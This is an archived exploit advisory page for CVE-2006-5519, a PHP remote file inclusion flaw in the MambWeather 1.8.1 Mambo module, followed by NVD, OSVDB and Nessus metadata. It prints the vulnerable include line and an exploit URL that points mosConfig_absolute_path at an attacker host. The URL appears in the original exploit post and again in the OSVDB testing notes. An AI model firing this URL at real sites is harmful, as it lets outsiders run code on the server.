MambWeather Mambo Module <= 1.8.1 - Remote Include Vulnerability
2006-10-22T00:00:00
ID EDB-ID:2613 Type exploitdb Reporter h4ntu Modified 2006-10-22T00:00:00
Description
MambWeather Mambo Module <= 1.8.1 Remote Include Vulnerability. CVE-2006-5519. Webapps exploit for php platform
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo module remote inclusion vulneribility
download : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip
bug found in file : MambWeather/Savant2/Savant2_Plugin_options.php
<?php
/**
* Base plugin class.
*/
global $mosConfig_absolute_path;
require_once $mosConfig_absolute_path.'/modules/MambWeather/Savant2/Plugin.php';
/**
exploit:
http://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker@dalnet
# milw0rm.com [2006-10-22]
{"hash": "e4acbe8d467009e928ed7bc23f9a1a8aed6825c941cc4aaef77078e1e3442622", "id": "EDB-ID:2613", "lastseen": "2016-01-31T16:39:50", "viewCount": 1, "bulletinFamily": "exploit", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.8}, "edition": 1, "history": [], "enchantments": {"vulnersScore": 7.5}, "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/2613/", "description": "MambWeather Mambo Module <= 1.8.1 Remote Include Vulnerability. CVE-2006-5519. Webapps exploit for php platform", "title": "MambWeather Mambo Module <= 1.8.1 - Remote Include Vulnerability", "sourceData": "Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew\nAnother Mambo module remote inclusion vulneribility\n\ndownload : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip\n \nbug found in file : MambWeather/Savant2/Savant2_Plugin_options.php\n \n <?php\n\n /**\n * Base plugin class.\n */\n global $mosConfig_absolute_path;\n\n require_once $mosConfig_absolute_path.'/modules/MambWeather/Savant2/Plugin.php';\n\n /**\n\nexploit:\n\nhttp://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]\n\nGreetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker@dalnet\n\n# milw0rm.com [2006-10-22]\n", "objectVersion": "1.0", "cvelist": ["CVE-2006-5519"], "published": "2006-10-22T00:00:00", "osvdbidlist": ["29933"], "references": [], "reporter": "h4ntu", "modified": "2006-10-22T00:00:00", "href": "https://www.exploit-db.com/exploits/2613/"}
{"result": {"cve": [{"id": "CVE-2006-5519", "type": "cve", "title": "CVE-2006-5519", "description": "PHP remote file inclusion vulnerability in Savant2/Savant2_Plugin_options.php in the MambWeather 1.8.1 and earlier component for Mambo allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.", "published": "2006-10-26T12:07:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5519", "cvelist": ["CVE-2006-5519"], "lastseen": "2017-10-19T11:12:34"}], "osvdb": [{"id": "OSVDB:29933", "type": "osvdb", "title": "MambWeather for Mambo Savant2_Plugin_options.php mosConfig_absolute_path Variable Remote File Inclusion", "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n\nThis may be the same issue as Mosets Tree package (OSVDB 28708) which is included in the MambWeather module.\n## Manual Testing Notes\nhttp://[target]/[path]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker]\n## References:\n[Secunia Advisory ID:22521](https://secuniaresearch.flexerasoftware.com/advisories/22521/)\nISS X-Force ID: 29697\nGeneric Exploit URL: http://milw0rm.com/exploits/2613\nFrSIRT Advisory: ADV-2006-4150\n[CVE-2006-5519](https://vulners.com/cve/CVE-2006-5519)\nBugtraq ID: 20667\n", "published": "2006-10-22T08:03:55", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:29933", "cvelist": ["CVE-2006-5519"], "lastseen": "2017-04-28T13:20:26"}], "nessus": [{"id": "MOSCONFIG_ABSOLUTE_PATH_FILE_INCLUDE.NASL", "type": "nessus", "title": "Mambo / Joomla! Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities", "description": "A third-party component for Mambo, Module, or Joomla! is running on the remote host. At least one of these components is a version that is affected by a remote file include vulnerability due to improper sanitization of user-supplied input to the 'mosConfig_absolute_path' parameter before using it to include PHP code. Provided the PHP 'register_globals' setting is enabled, an unauthenticated, remote attacker can exploit this issue to disclose arbitrary files or execute arbitrary PHP code on the remote host, subject to the privileges of the web server user ID.", "published": "2006-07-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=22049", "cvelist": ["CVE-2007-5412", "CVE-2006-3556", "CVE-2006-5048", "CVE-2006-3846", "CVE-2008-5789", "CVE-2007-5457", "CVE-2006-4270", "CVE-2006-6962", "CVE-2008-5790", "CVE-2006-3750", "CVE-2008-6841", "CVE-2006-3947", "CVE-2007-3130", "CVE-2006-5045", "CVE-2007-2319", "CVE-2010-2918", "CVE-2006-4553", "CVE-2008-0567", "CVE-2006-4288", "CVE-2006-3751", "CVE-2006-4195", "CVE-2006-5519", "CVE-2006-3530", "CVE-2007-2144", "CVE-2006-3773", "CVE-2006-3774", "CVE-2007-1702", "CVE-2006-3980", "CVE-2006-3995", "CVE-2006-3949", "CVE-2007-2005", "CVE-2008-5793", "CVE-2006-4074", "CVE-2006-3748", "CVE-2006-4858", "CVE-2006-4130", "CVE-2006-3749", "CVE-2006-3396", "CVE-2007-5310"], "lastseen": "2018-06-14T11:43:59"}]}}
